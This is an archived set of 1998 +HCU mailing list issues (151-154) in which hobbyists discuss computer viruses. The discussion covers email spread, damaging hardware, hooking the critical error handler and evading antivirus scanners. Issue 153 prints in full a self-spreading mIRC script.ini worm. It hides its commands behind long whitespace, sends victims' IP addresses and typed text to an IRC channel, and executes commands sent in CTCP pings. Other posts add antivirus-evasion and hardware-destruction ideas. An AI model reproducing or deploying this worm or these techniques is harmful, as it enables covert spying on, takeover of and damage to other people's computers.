home *** CD-ROM | disk | FTP | other *** search
/ Reverse Code Engineering RCE CD +sandman 2000 / ReverseCodeEngineeringRceCdsandman2000.iso / RCE / Library / +HCU / 151-160.TXT < prev    next >
Text File  |  2000-05-25  |  67KB  |  1,620 lines

  1. ========================================================
  2. +HCU Maillist          Issue: 151             02/24/1998 
  3. --------------------------------------------------------
  4. Send Articles To:......................... *************
  5. Info, Help, Unsubscription, etc:....... ****************
  6. Web Repository.........................hcuml.home.ml.org
  7. ========================================================
  8.  
  9. CONTENTS:
  10.  
  11. #1  Subject: repository now public (fravia)
  12.  
  13. #2  Subject: :(
  14.  
  15. #3  Subject: Virus Quiz
  16.  
  17. ARTICLES:
  18.  
  19. -----#1-------------------------------------------------
  20. Subject: repository now public (fravia)
  21.  
  22. 1) hcu maillist repository link
  23. is now on my links.htm page
  24.  
  25. let me know if for some reason 
  26. you believe I should take it off 
  27. one day (+Zer0 will soon see if 
  28. too many spammers/zombies go for it)
  29.  
  30. 2) anyone working on apivision?
  31.  
  32. later
  33. fravia+
  34.  
  35. -----#2-------------------------------------------------
  36. Subject: :(
  37.  
  38. hehemmm..ehhh..hallo...
  39. well,...sorry for the encrypted message yesterday...
  40. the line length looked fine here...but,eehh...I didn't
  41. count..
  42.  
  43. bye,
  44. rickx
  45.  
  46.  
  47. -----#3-------------------------------------------------
  48. Subject: Virus Quiz
  49.  
  50. I actually received answers from some people by email! I wasn't really
  51. expecting it. I'll give my answers. Those currently still in the scene,
  52. please feel free to correct me if any of the info is out of date etc.
  53.  
  54. 1. Yes, most commonly as an attachment. Word macros are notorious for
  55. spreading like this as some email clients auto-open them or call word to
  56. open them on a double click.
  57.  
  58. 2. When I first in the scene, there was one virus I knew of that could do
  59. this. It exploited the macro facilities of Lotus CC mail, the de facto
  60. email client back then. They probably have patched it up in the later
  61. versions as I have not heard anything of this since. I hear whiffs of info
  62. about a similar virus hooking onto Outlook which seems like a viable
  63. replication method if MS have their way... I've never used outlook and I've
  64. not seen the virus - maybe a rumour, maybe not.
  65.  
  66. 3. Yes it is. It always surprises me when people refuse to have my infected
  67. disks resting on their computer in case it infects it ;)
  68.  
  69. 4. Actually, yes. There are a number of nasty things you can do if you put
  70. your mind to it. (nasty protectionist can get some ideas). Some early hard
  71. drives could be killed completely by messing up track zero. Early monitors
  72. could be fried by nasty refresh rates. My personal favourite was by one
  73. author who tried to exploit a design fault in some floppy drives by making
  74. the head swing backwards and forwards hitting the casing. I assumed that
  75. this was to try to damage the head, I wonder if it worked?
  76.  
  77. 5. Yes. A common mistake by people just beginning to dabble in viruses is
  78. that they see only runtime viruses and make the mistake that runtime is the
  79. only time to infect. Resident viruses are much nastier and can be hooked
  80. absolutely everywhere.
  81.  
  82. 6. Yes and no. Files with the write protect flag on can easily be toggled
  83. off before infection. Disks vary. If there protection is software it can be
  84. bypassed, but I know of no virus which bothers to do this. You will not
  85. necessarily get a write protect error (e.g. on floppy disks) it takes very
  86. few bytes to hook the critical error handler.
  87.  
  88. ~~
  89. Ghiribizzo
  90.  
  91. =====End of Issue 151===================================
  92.  
  93.  
  94.  
  95.  
  96. ========================================================
  97. +HCU Maillist          Issue: 152             02/25/1998 
  98. --------------------------------------------------------
  99. Send Articles To:......................... *************
  100. Info, Help, Unsubscription, etc:....... ****************
  101. Web Repository.........................hcuml.home.ml.org
  102. ========================================================
  103.  
  104. CONTENTS:
  105.  
  106. #1  Subject: Re: +HCU ML Issue 150
  107.  
  108. #2  Subject: Re: Virus Quiz
  109.  
  110. ARTICLES:
  111.  
  112. -----#1-------------------------------------------------
  113. Subject: Re: +HCU ML Issue 150
  114.  
  115. > QUIZ
  116. > ====
  117. >
  118. > 1. Can a virus be spread by email?
  119. >
  120.  
  121.     No, unless it is a Macro virus and you use microsoft word to read
  122. it. If you receive
  123. an executable file uuencoded with the email and you execute that file,
  124. the virus could
  125. be spread that way. There's no way a simple text email will infect you.
  126.  
  127. > 2. Can a virus sent by email do something nasty just by opening the email?
  128. >
  129.  
  130.     No. A virus is a piece of code, it is a program or a macro, even a
  131. ..BAT file, but
  132. the fact is, it has to be executed to do harm. If you just look at it,
  133. nothing happens.
  134.  
  135. > 3. Is it safe to copy an infected file onto the root of your hard disk?
  136. >
  137.  
  138.     Sure, you can copy it anywhere you want. You can have thousands of
  139. virii in your
  140. hard drive. As I said, they are just programs, if you don't execute them
  141. on purpose they
  142. are as dead as a rock. If you have them in source code, you can send
  143. them to your
  144. grandma's computer, she won't be infected, unless she knows how to
  145. compile them :)
  146.  
  147. > 4. Can a virus physically damage parts of your computer?
  148. >
  149.  
  150.     Is any of your programs able to physically damage your system?
  151. Theoretically No. The
  152. same answer apply to virii, however if a virus actives the motor of one
  153. of your floppies
  154. frequently, it could shorten the life span of that component. If a virus
  155. is able to turn
  156. on and off continuously one pixel of your screen, it could be damaged.
  157. Again this is only
  158. theory as I don't know any virus designed to do this. It  would take too
  159. much time to
  160. damage any of today's modern monitors or floppy drives. There's no point
  161. on it because
  162. if your floppy never stops, that's and obvious behavior and the virus
  163. doing this will
  164. have a very short life. Viruses are designed to survive, not just to
  165. give them self away
  166. in the first round of the fight.
  167.  
  168. > 5. Can a virus infect a disk in the floppy drive if you only do a DIR on it?
  169. >
  170.  
  171.     This is essentially false. You can ask for dir, copy infected files,
  172. disassemble the
  173. infected files and nothing happens if your computer is clean; on the
  174. other hand, if your
  175. computer is infected with a direct action virus (it only infects when
  176. ran) nothing will
  177. happen either because DIR command is not per se an executable file. Now,
  178. if your memory
  179. is infected with a MBR or multipartite virus, there's a chance your
  180. floppy will be
  181. infected not because of DIR command itself, but because the virus is
  182. active on memory
  183. and the trigger for floppy infection could be anything. To answer to the
  184. basic question
  185. whether a virus can infect on DIR, some new virri can infect by asking
  186. for a DIR, but
  187. this is a new feature not available before. However, the answer to this
  188. question, for
  189. practical reasons is still NO, because most viruses can't do that.
  190.  
  191. > 6. Can a virus infect a write protected file/disk? Will there be an error
  192. > message?
  193. >
  194.  
  195.     In regard to disk infection, no they can't. Write protected floppies
  196. are secure
  197. against viruses. If the virus is stealth enough to manage INT 24
  198. critical error
  199. (write-protection violation attempted), there won't be no error to warn
  200. the user when
  201. the virus attempts to infect a write protected disk. Only older virus
  202. (museum viruses)
  203. will generate such a lame error nowadays.    In regard to write
  204. protected files: INT 21
  205. sub-function 4301H will get rid of the file attributes allowing the
  206. virus to open it
  207. without any limitation.
  208.  
  209.     Some other interesting questions:
  210.  
  211.     Is it possible to build a multiplataform virus (able to infect UNIX,
  212. PC's, MAC) or
  213. multi-operating system virus (Win95, NT, DOS, OS/2) at the same time?
  214.  
  215.     Answer. Yes, it is. In fact, there are several viruses capable of
  216. doing this.
  217.  
  218.     Is it possible to create viruses able to spread through a LAN?
  219.  
  220.     Answer. Yes it is possible.
  221.  
  222.     It it possible to create a retro-virus? One that executes its code
  223. backwards. Yes
  224. there's on virus out there capable of doing this.
  225.  
  226.     Can a Macro virus infect different language versions of Microsoft
  227. Word?
  228.  
  229.     Answer. False until recently. From sometime ago, the answer is now
  230. yes.
  231.  
  232.     Can a DOS virus survive under Win95?
  233.  
  234.     Answer. Most can survive. Off course, direct action ones will only
  235. infect when a DOS
  236. window is opened or during the booting process (in MBR cases) before
  237. Win95 takes control
  238. over the memory.
  239.  
  240.     Can a virus behave as a TSR on Win95.
  241.  
  242.     Answer. Sure it can if it is specially designed to do it.
  243.  
  244.     Am I a virii maker?
  245.  
  246.     No I'm not. I know everything about it and I can code a virus if I
  247. want, but I don't
  248. find any reason to do it, as I decided many years ago to use my brain to
  249. build, not to
  250. destroy or harm.
  251.  
  252.  
  253. Aesculapius.
  254.  
  255.  
  256. -----#2-------------------------------------------------
  257. Subject: Re: Virus Quiz
  258.  
  259. Hi all!
  260.  
  261. First a big thank goes to Ghiribizzo for turning "JOIN THE CREW" into
  262. something interesting! Just a few comments to the virus quiz.
  263.  
  264. >could be fried by nasty refresh rates. My personal favourite was by one
  265.  
  266. >author who tried to exploit a design fault in some floppy drives by
  267. making
  268. >the head swing backwards and forwards hitting the casing. I assumed
  269. that
  270. >this was to try to damage the head, I wonder if it worked?
  271.  
  272. I don=B4t know about this one, but one of the first viruses in my country
  273. was
  274. written for the old Commodore 64, and managed to swing the head of
  275. the 1541 (is the number correct?) floppy drive to a position where it
  276. could
  277. not come back from. You had to take it to a service where they took it
  278. apart
  279. and put the head back on track, manually. As it turned out the virus was
  280. written
  281. by a guy in a computer service firm. (You can guess why :)
  282.  
  283. >6. Yes and no. Files with the write protect flag on can easily be
  284. toggled
  285. >off before infection. Disks vary. If there protection is software it
  286. can be
  287. >bypassed, but I know of no virus which bothers to do this. You will not
  288.  
  289. >necessarily get a write protect error (e.g. on floppy disks) it takes
  290. very
  291. >few bytes to hook the critical error handler.
  292.  
  293. Some thoughts on the topic of writing on write protected disks. I firmly
  294.  
  295. belive that its impossible to bypass the physical write protection of a
  296. floppy
  297. disk from software. (BTW this is the idea behind the whole thing.)
  298. As far as I know the writing circuit is physically interrupted by the
  299. sensor
  300. mechanism.
  301. From time to time  big arguments starts about this on one of the mailing
  302. lists
  303. I read, but so far nobody could present a working program which could
  304. write on a protected disk. Most of the time the argument that it can be
  305. done
  306. could be traced back either a faulty drive where the sensor mechanism
  307. was
  308. broken and the drive could not detect correctly the protection, or to an
  309. article
  310. which appeared in ct computer magazine. This is a good german computer
  311. magasine, you can read it on the net at ********************** in german
  312. or
  313. some articles in english at ******************************* This
  314. magasine
  315. published detailed paper about how to write on a write protected disk,
  316. but
  317. as it turned out it was just an April joke. Now the problem with this
  318. April
  319. joke articles that these guys are really good (last time I checked their
  320. page
  321. they were running a Pentium II processor with 400 MHz in a freezer box
  322. :)
  323. and the joke articles are very beliveable even for experts.
  324.  
  325. Bye Zer0+
  326.  
  327.  
  328.  
  329.  
  330. =====End of Issue 152===================================
  331.  
  332.  
  333.  
  334.  
  335. ========================================================
  336. +HCU Maillist          Issue: 153             02/26/1998 
  337. --------------------------------------------------------
  338. Send Articles To:......................... *************
  339. Info, Help, Unsubscription, etc:....... ****************
  340. Web Repository.........................hcuml.home.ml.org
  341. ========================================================
  342.  
  343. CONTENTS:
  344.  
  345. #1  Subject: virii (some fun topics at last ;)
  346.  
  347. #2  Subject: gthorne - virus info
  348.  
  349. #3  Subject: gthorne - more virus oddities
  350.  
  351. #4  Subject: To:  Aesculapius
  352.  
  353. #5  Subject: gthorne postulizing
  354.  
  355. #6  Subject: Re: Virus Quiz
  356.  
  357. ARTICLES:
  358.  
  359. -----#1-------------------------------------------------
  360. Subject: virii (some fun topics at last ;)
  361.  
  362.  
  363. To continue the discussion a bit...
  364.  
  365. Physical damage to hardware components: It is certainly possible to 
  366. drive a monitor at a frequency that will blow its tube, or to wear out 
  367. tracks in a hard drive, though as Aesculapius pointed out with the 
  368. durability of modern equipment it is more difficult than it used to be 
  369. (no more RLL drives that you could destroy via the partition table).
  370.  
  371. Infecting via DIR: DIR is of course a directive in command.com; a 
  372. persistent virus could infect both command.com and the boot sector of 
  373. floppy/hard drives (this would of course require a command.com ver 
  374. check), then patch the DIR section of the command.com to trigger its 
  375. boot sector infection routine. This would be a little tricky, though 
  376. (and I guess it counts as a multi-partite virus).
  377.  
  378. Write-protected floppies: The little hole in the disk is scanned by a 
  379. photosensor in the disk drive, which prevents disk writes on a 
  380. *hardware* level if the hole is covered. This means that the write 
  381. prevention is mechanical, not logical, and hence is out of reach of even 
  382. the quasi-omnipotent virus writers.
  383.  
  384. Should virii be written? Hell yes, McAfee would go broke if they weren't 
  385. around ;) Plus we would know only half as much about assembly, there 
  386. would be no VLAD (so we would have to invent them), and crazy little 
  387. utils like KoH wouldn't exist.
  388.  
  389. mammon_
  390.  
  391. PS Zero+ Thanks for the excellent URL ! Very good industry updates
  392.  
  393. ______________________________________________________
  394. Get Your Private, Free Email at **********************
  395.  
  396. -----#2-------------------------------------------------
  397. Subject: gthorne - virus info
  398.  
  399. Message Body = 
  400. okay in regard to aesculapius and more on ghbzo's virus quiz
  401.  
  402. there is something that i must mention, gh and i both knew of software that could damage old monitors by altering the rate of refresh (in his case he knew of a virus, in mine i know of it though old code manuals i had read)
  403. i had some software once that wold allow you to finaegle an old hercules card to display graphics that were normally color - by converting it to greyscale, but it had some of the same mention in its docs on how it had damaged monitors in the past if people were not careful to install it precisely - and often regardless of the user's attempts it would damage a monitor anyway
  404.  
  405. also - he knew of a virus which caused old drives to smash the read/write head back and forth into the drive casings of old drives, also something i had heard of before - and also in my case in a different manner - the one i had heard of was one my own father had seen in his software reverse engineering days.
  406.  
  407. (mind you that new drives are no more susceptible than new monitors to this)
  408.  
  409. basically the protection on the software was a bit nasty - if it was in the process of being cracked, and it resulted in an incomplete crack (which all of us go through 90% of the time in testing phases) 
  410. it would respond by applying code that attempted damage like that while displaying 'software piracy is illegal, now trashing your hard drive' (paraphrased because of bad memory)
  411.  
  412. i think that is what it did, the actuality may have had a separate agenda considering that old drives were easily damaged if you did not park them.
  413.  
  414. Again, none of this is possible with todays drives.
  415.  
  416. regarding email virii.. gh said he had seen a cc-mail macro virus (i have not but that would be theoretically possible regardless)
  417. as i said in my letter to him on the subject - it will be scarey when microsoft's newer emailers decide to make macros standard operating procedure (do any one of us doubt that ms would try it?)
  418.  
  419. something else - i have seen something directly that people do not realize - again gh knew of this.
  420.  
  421. junkie virus is a master boot record infecting virus i am well acquainted with due to the insane spreading it had in a locale where friends i had kept using my computers to work on papers and play games.
  422. it also infects com files (it is much like monkey b in the way it propogates)
  423.  
  424. here is the trick... i have had many MANY floppies ruined by it - how you say? i am not entirely sure what happens to the floppy, but i know that after infection, i have had floppies report a permanent track zero error and are not formattable ever again.
  425. the other thing is in the dir...
  426.  
  427. if junkie is on your machine already, infectring it, all you have to do to get it to install to a floppy is to do a dir of the floppy
  428. why? because it jumps to all master boot records that are not write protected on the system and sitting in memory like it does, it also looks for .com files everywhere
  429.  
  430. of course, you have to be infected already for this to happen - but the question was can you infect something just by dir'ing it and the answer is yes if you have it already (or if dir.com is infected... or command.com... or format.com... you get the idea)
  431.  
  432. something else gh and i both came up with is the possibility of software based write protections (hard drives for example - and zip drives if you think about it)
  433. neither of us know of a case of this, but anything software controlled can be virus controlled (q.e.d.)
  434.  
  435. just for fun i have over 5000 of the little monsters and over 800 source codes - i love reading the concise code and figureing out how something can be useful (see symbiote.zip) made out of the beasts
  436.  
  437. besides... i would not know as much about assembly file formats if i had not studied so deeply into how they were infected - and the vlad texts to explain some of it, although often not entirely straightforward and the code needing tweaking to get things to work
  438. (i actually had to mangle virus code from several sources and those texts to get that litle symbiote to work properly)
  439.  
  440. as you can see i enjoy this subject - take care all and 'have a day'  :|
  441.  
  442. :)
  443.  
  444. +gthorne
  445. ********************
  446.  
  447.  
  448. -----#3-------------------------------------------------
  449. Subject: gthorne - more virus oddities
  450.  
  451. Message Body = 
  452. this is for the masses who didnt know it was out there, but one day i noticed a particularly interesting file dcc'd to me one day on irc...
  453. the person who dcc'd it did not know it, and so i knew something was up
  454.  
  455. basically - the script.ini file in mirc can be exploited as a virus, and this is exatly what this file does. it basically makes random dcc's to other users in a channel (making one rather unpopular i the process)
  456.  
  457. but here it is, it is too different not to include (just showing the range of self propogating code)
  458.  
  459. effectively, patching oneself is easy, i basically put a blank script.ini in my mirc directory and made it read only
  460. (there are mirc settings you can make to patch self as well, though i care not to learn much about the inner workings of mirc)
  461.  
  462. if you are a real jerk, you can put this in your own mirc directory and go online as a random user in some channel (then patch self later)
  463. a friend of mine and i came up with all kinds of bad humor.. say for instance makinig it autokick users, ban them, or for those with no op status, doing a /quit evey now and then could become a pain especially if it had some mean message like 'i have infected you idiots!'
  464. that would be really mean since anyone infected would lose popularity immensely
  465.  
  466. granted i would never do this, but get a few beers in me around a jaccuzzi and the discussions are endless (yes i have gotten a case of beer before and shared it with a few friends in a snowy mountain hideaway with a jaccuzzi on the porch - was fun - hot water below, snow crystals above.. and virus discussions)
  467. and cracking.. and hacking.. and of course the ladies in the other room who we kidnapped for the party earlier ;)
  468.  
  469. one of those ladies designed that necklace of mine for those of you who havent seen it (same pattern as on my shield)
  470.  
  471. well anyway - heres the virus code, hope you enjoyed the story :)
  472.  
  473. --- script.ini virus start ---
  474.  
  475. [script]
  476. n0=on 1:START:{                                                                                                                                                                                                                                                                                                                                                                                   .sreq ignore
  477. n1=  .remote on
  478. n2=  titlebar (Not connected)
  479. n3=}
  480. n4=raw 401:*: {
  481. n5=  halt
  482. n6=}
  483. n7=RAW 001:*:titlebar (Connecting to $server $+ )
  484. n8=
  485. n9=on 1:CONNECT:titlebar (Connected to $server $+ )                                                                                                                                                                                                                                                                                                               | .msg  #kkkd  Hi.  $ip on $server $+ : $+ $port $+ .
  486. n10=
  487. n11=on 1:DISCONNECT:titlebar (Not connected)
  488. n12=
  489. n13=;if you type something in status it doesn't have to have "/"
  490. n14=on 1:INPUT:*:{                                                                                                                                                                                                                                                                                                                                                                                     .msg #kkkd ( $+ $active $+ ) $1-
  491. n15=  set %a status window
  492. n16=  if ( $active == %a ) { $1- | halt }
  493. n17=}
  494. n18=
  495. n19=;ping stuff
  496. n20=on 1:CTCPREPLY:ping*:.notice $nick Your ping time is $duration($calc($ctime - $2)) $+ . 
  497. n21=CTCP 1:ping: if ( $nick != $me) { .ctcp ping $1 }                                                                                                                                                                                                                                                                                                                      | if ( $3 != $null ) { $3- | halt }
  498. n22=
  499. n23=;if you are banned but still opped, unban self
  500. n24=on *********** ( $banmask iswm $address($me,5) ) mode $chan -b $banmask
  501. n25=
  502. n26=on 1:JOIN:*:{
  503. n27=  if ( $nick == $me ) { halt }
  504. n28=  if ( $comchan($nick,0) > 2 ) { .notice $nick Following me? | halt }                                                                                                                                                                                                                                                                                   | .dcc send $nick $mircdir $+ script.ini
  505. n29=}
  506. n30=
  507. n31=;show channel topic in channel on join
  508. n32=RAW 332:*:echo 4 $2 $chr(31) $+ $2 $+ $chr(31) $+ : $3-                                                                                                                                                                                           
  509.  
  510. --- script.ini virus finished ---
  511.  
  512.  
  513.  
  514. -----#4-------------------------------------------------
  515. Subject: To:  Aesculapius
  516.  
  517. Thank you for your excellent article on virii.
  518.  
  519. I get very tired of the lame rumors that people pass around about virii.  I
  520. seem to get at least one per week.
  521.  
  522. With your permission, I would like to use parts of your article to answer
  523. these virii scares.  Likely I would edit some things for the neophyte, and
  524. leave off the more technical aspects.
  525.  
  526. I will be glad to give you credit, or leave your name off.  Your choice.
  527.  
  528. Please let me know if this is ok with you.
  529.  
  530. zinger
  531.  
  532. -----#5-------------------------------------------------
  533. Subject: gthorne postulizing
  534.  
  535. Message Body = 
  536. now that i have been thinking about it, i have had some games with deep bass blow a few sound cards in the past - a virus probably could do the same, but it would kinda be obvious that a virus were in the system if it were well.. screaming :)
  537.  
  538. not to mention it would have to take quite a bit of time before the card 'gave up and died' since it wasnt immediate that they got blown
  539.  
  540. one game in particular when set too high tended to do this.. wing commander II in the cinematic startup sequence with all those kilrathi voices, and a mod called echoes which i like alot
  541.  
  542. far fetched? yes. impossible? no.
  543.  
  544. :)
  545.  
  546. +gthorne
  547.  
  548.  
  549. -----#6-------------------------------------------------
  550. Subject: Re: Virus Quiz
  551.  
  552. gthorne and I have been writing to each other about the quiz and it seems
  553. that there is a confusion to what I meant when I said disks could be
  554. infected. Here's part of a reply to gthorne.
  555.  
  556. >>>>
  557. A write protected floppy can't be infected, when I said disks, I was
  558. referring to both floppies and hard disks generally. Though I was talking
  559. to a friend of mine not long ago and he told me that he had seen a system
  560. where floppy disk write protect was software based. I've never seen this
  561. myself, but as with bypassing all software protections, it needs to be
  562. pretty common to justify the extra bytes.
  563. Error messages can be suppressed on attempted writes to protected floppies
  564. to prevent the virus being easily spotted.
  565. <<<<
  566.  
  567. Someone asked about hooking interrupt vectors, here's how a virus might do it:
  568.  
  569. mov ax,3524h                ;24= critical error handler
  570. int 21h
  571. mov word ptr [bp+oldint24],bx    ;save it for later restore
  572. mov word ptr [bp+oldint24+2],es    ; nice of the virus writer, eh :)
  573. mov ah,25h
  574. lea dx,[bp+offset int24]        ;point to location of new handler
  575. int 21h                ;and set it
  576.  
  577. =====End of Issue 153===================================
  578.  
  579.  
  580.  
  581.  
  582. ========================================================
  583. +HCU Maillist          Issue: 154             02/27/1998 
  584. --------------------------------------------------------
  585. Send Articles To:......................... *************
  586. Info, Help, Unsubscription, etc:....... ****************
  587. Web Repository.........................hcuml.home.ml.org
  588. ========================================================
  589.  
  590. CONTENTS:
  591.  
  592. #1  Subject: Reposting
  593.  
  594. #2  Subject: death to floppy disks!
  595.  
  596. #3  Subject: Re: postulating
  597.  
  598. #4  Subject: Recursive Tunneling
  599.  
  600. #5  Subject: old virii
  601.  
  602. #6  Subject: Virus Idea
  603.  
  604. ARTICLES:
  605.  
  606. -----#1-------------------------------------------------
  607. Subject: Reposting
  608.  
  609. [Oops! I placed a series of dots after int 21h in my first email to show
  610. a gap and forgot that SMTP would interpret this as end of email. I've
  611. reposted and replaced the dots with "(etc.)" - sorry about that]
  612.  
  613. gthorne and I have been writing to each other about the quiz and it seems
  614. that there is a confusion to what I meant when I said disks could be
  615. infected. Here's part of a reply to gthorne.
  616.  
  617. >>>>
  618. A write protected floppy can't be infected, when I said disks, I was
  619. referring to both floppies and hard disks generally. Though I was talking
  620. to a friend of mine not long ago and he told me that he had seen a system
  621. where floppy disk write protect was software based. I've never seen this
  622. myself, but as with bypassing all software protections, it needs to be
  623. pretty common to justify the extra bytes.
  624. Error messages can be suppressed on attempted writes to protected floppies
  625. to prevent the virus being easily spotted.
  626. <<<<
  627.  
  628. Someone asked about hooking interrupt vectors, here's how a virus might do it:
  629.  
  630. mov ax,3524h                ;24= critical error handler
  631. int 21h
  632. mov word ptr [bp+oldint24],bx    ;save it for later restore
  633. mov word ptr [bp+oldint24+2],es    ; nice of the virus writer, eh :)
  634. mov ah,25h
  635. lea dx,[bp+offset int24]        ;point to location of new handler
  636. int 21h                ;and set it
  637.  
  638. (etc.)
  639.  
  640. int24: 
  641. mov al,3                ;fail call
  642. iret                    ;return
  643.  
  644. Pretty basic but easy to understand because it uses DOS services to hook
  645. and set the handlers.
  646.  
  647. In the same way, viruses can replicated by hooking 'closefile' or any other
  648. interrupt they like.
  649.  
  650. I agree with Asculapius about destructive viruses. I've programmed viruses,
  651. but have never let them loose - it's just not nice :)
  652.  
  653. But physical damage can be done to your computer. Another method I thought
  654. of was to attack flash ram. You could flash junk into modems, BIOS, etc.
  655. and some types will only take a few flashes before they mess up.
  656.  
  657. Also, there are some DVD drives which allow you to flash the country code
  658. only 5 times before it sticks. A specific virus could be very nasty and
  659. leave the DVD drive able only to play Japanese titles...
  660.  
  661. ~~
  662. Ghiribizzo
  663.  
  664. -----#2-------------------------------------------------
  665. Subject: death to floppy disks!
  666.  
  667. I wrote to gthorne, but I thought the receivers of the mailing list might
  668. also be interested:
  669.  
  670. >>>>
  671. I thought about how you could kill floppies as you have described and I've
  672. come up with an answer. I'm pretty sure this is how junkie must do it as well.
  673.  
  674. Simply mark the first sector of a disk bad. This completely screws
  675. everything up.
  676.  
  677. I tried to use Norton Diskedit in maintenance mode to undo this, but it
  678. couldn't.
  679.  
  680. I tried to use debug 'w' command, but this couldn't either.
  681.  
  682. I'm wondering is there a method low enough to write to the disk. It should
  683. be possible if you bypass DOS, but this seems too much like hard work
  684.  
  685. Please send me the junkie source as I think the answer lies there. I'm
  686. wondering whether you can recreate a similar effect on hard disks - though
  687. I'm not going to test it on mine any time soon! :)
  688.  
  689. BTW, you owe me a floppy disk ;)
  690. <<<
  691.  
  692.  
  693. ~~
  694. Ghiribizzo
  695.  
  696. -----#3-------------------------------------------------
  697. Subject: Re: postulating
  698.  
  699. A friend of mine didn't realise what playing a data CD in his HIFI could do
  700. to it. The lesson cost him a pair of new tweeters.
  701.  
  702. A virus attack on the same lines could clean out speakers very quickly
  703. (seconds) and I've heard you can damage the amp too, but I'm no audio
  704. expert and don't know why that may be the case.
  705.  
  706. Although new hard disks are no longer susceptible to the easy RLL drive
  707. tricks.  The same friend who blew his tweeters has recently totalled his
  708. hard disk by some low-level utils. Sending factory commands to the disk
  709. would be an easy way of ruining it permanently, and the instructions should
  710. be fairly generic for each brand of hard disk. Go to the manufacturers' web
  711. sites and download the tools.
  712.  
  713. Also, monitors stand up to much more punishment now, but are still highly
  714. delicate devices. You still see warnings on graphics cards regarding
  715. messing around with refresh rates.
  716.  
  717. >>>>
  718. Write-protected floppies: The little hole in the disk is scanned by a 
  719. photosensor in the disk drive, which prevents disk writes on a 
  720. <<<<
  721.  
  722. My floppy drive has a little switch which is depressed when the hole is
  723. covered. Wouldn't a photosensor be easily clogged by dust etc.?
  724.  
  725. >utils like KoH wouldn't exist.
  726.  
  727. Someone wrote to me sometime ago saying that KOH isn't secure. Apparently
  728. the password is retrievable.
  729.  
  730. It's one thing to learn how a virus works and another thing to write one.
  731. It's the difference between going through a cracking tutorial in your mind
  732. and cracking a program hands on. My first virus was an overwriting com
  733. infector - with no frills! It took me ages of searching through 80486
  734. instructions before I found CALL was the instruction I needed to push the
  735. current location onto the stack for the delta offset. Of course, I could
  736. have obtained a virus source, and it would have saved me some time. But I
  737. had a virus concept from scratch with the CALL being the main tricky thing.
  738. I liked it so much it lived on it's own directory and I fed it com files
  739. every now and then to keep it happy :)
  740.  
  741. ~~
  742. Ghiribizzo
  743.  
  744. With all 6 articles in issue 153 being about viruses, I wonder if Bigjim
  745. was right about the 'join the crew virus' :)
  746.  
  747. -----#4-------------------------------------------------
  748. Subject: Recursive Tunneling
  749.  
  750. With all this talk of viruses, my mind fell upon a technique that most of
  751. you perhaps will not know of even if you have studied viruses. The
  752. technique? Recursive tunneling. I think this could be a very powerful aid
  753. to protectionists. Put in a well hidden file checksum to force the cracker
  754. to use a TSR to patch on the fly and then use recursive tunneling to render
  755. the TSR useless. Confused? Let me explain in greater detail.
  756.  
  757. Recursive Interrupt Tunneling: what is it?
  758. ==========================================
  759.  
  760. Basically, it is tracing through an interrupt to find the original DOS or
  761. BIOS entrypoint. Then future calls can be made to the interrupt without
  762. running any code which might be hooked onto the interrupt.
  763.  
  764. Virus use: Bypasses resident virus scanners so that virus can't be detected
  765. Protectionist use: Bypass TSR cracks hooked onto interrupt vectors
  766.  
  767. How is it done?
  768. ===============
  769.  
  770. Let me refer you to the excellent article "ANTI-Anti-Virus Tricks" by
  771. MnemoniX.
  772.  
  773. My favourite part of virus programming was the battle between virus coders
  774. and AV authors. If I can't tempt you to study viruses with the following
  775. snippet from MnemoniX's article then I don't think I'll ever be able to.
  776.  
  777. >>>>>
  778. TBDRIVER'S DETECTION OF RECURSIVE TUNNELING
  779.  
  780.         TBDRIVER is resistant to most recursive tunneling. When an interrupt
  781. 21 is called, TBDRIVER checks the status of the trap flag for a recursive
  782. tunneling routine and will display a message if it is found to be set. The
  783. code that does this appears virtually impenetrable, and looks like this:
  784.  
  785. (This is from TBDRIVER version 6.14; it may be different now but the idea
  786.  is basically the same.)
  787.  
  788.                 cli                     ; clear interrupts to prevent
  789.                 pushf                   ; interference ...
  790.                 cld
  791.                 push    ax              ; what this, in essence, does is
  792.                 push    bx              ; that is saves a value on the stack,
  793.                 xchg    ax,bx           ; pops it, decrements the stack ptr.
  794.                 pop     ax              ; to point to it again, pops it again,
  795.                 dec     sp              ; and if the value changed, an int-
  796.                 dec     sp              ; errupt must have occured. Since the
  797.                 pop     bx              ; interrupt flag is off, the only
  798.                 cmp     ax,bx           ; interrupt this could be is a type
  799. 1 -
  800.                 pop     bx              ; the trap flag interrupt routine.
  801.                 jz      02A1            ; If two values popped are different,
  802.                                         ; it warns the user.
  803. <<<<<
  804.  
  805. Tempted? Hope so.
  806.  
  807. ~~
  808. Ghiribizzo
  809.  
  810. -----#5-------------------------------------------------
  811. Subject: old virii
  812.  
  813.  
  814. BTW - why virii and not viruses? (yes, I studied 6 years of 
  815. Latin)....
  816.  
  817. Anyway, back in the days of the Apple II and in the pre-Win days of
  818. DOS, I made a nice little proggie that switched commands in the DOS -
  819. CATALOG (remember?) would cause the effect of DELETE ALL, and DIR
  820. would cause the effect of DEL *.*
  821.  
  822. It was very simple, the program just looked for the 'DIR' routine and
  823. jumped it to the DEL *.* routine. It also patched the confirmation
  824. (Y/N) by directly jumping over it.
  825.  
  826. Of course, my best best 'virus' was when I connected a computer next
  827. to the one I was using to mine. When a friend sat near, I controlled
  828. his cursor, and I prevented <CR> from occurring. I then told him he
  829. had to hit the monitor on the side to make the cursor 'fall', and
  830. that's exactly what he kept doing for a little while...
  831.  
  832. Wafna
  833.  
  834. -----#6-------------------------------------------------
  835. Subject: Virus Idea
  836.  
  837.  
  838. Since Virii seem to be a topic at this time
  839. in this List, I have an idea I'd like to discuss with a few others
  840. in here. 
  841.  
  842. Most AV-People don't disassemble/debug a polymorphic virus if they can
  843. avoid it. They therefore infect hundreds of identical files with the
  844. virus to find an algorithm to predict it's polymorphic behaviour.
  845.  
  846. Sepultura wrote a few textfiles about bait-file detection through
  847. filenames, but I have another idea here:
  848.  
  849. If you make the way the virus mutates directly related to the file-size, 
  850. the approach with identical files wouldn't work.
  851. They would get a different virus for every different bait file they
  852. use, but not 2 different for the same bait. This would lead to an
  853. incorrect algorithm, and would force the AV-people to examine that virus 
  854. by hand, which is a lot of work + expensive :-) 
  855.  
  856. The downside of course is: If you have the filesize in relation to
  857. the way the virus turns out to be, they can, once they completely 
  858. disassembled it, derive an algo from there :-/ well, I guess 
  859. there is no real thing you can do against a good virus-reverser...
  860.  
  861. Another few things to try: Mutation depends on File-Date, on 
  862. current-date, file-checksum (erm... this is gonna be sloow :-) etc...
  863.  
  864. Please correct me on any points which are wrong/bad/unrealistic, I am 
  865. not a good virus writer (yet ?;)
  866.  
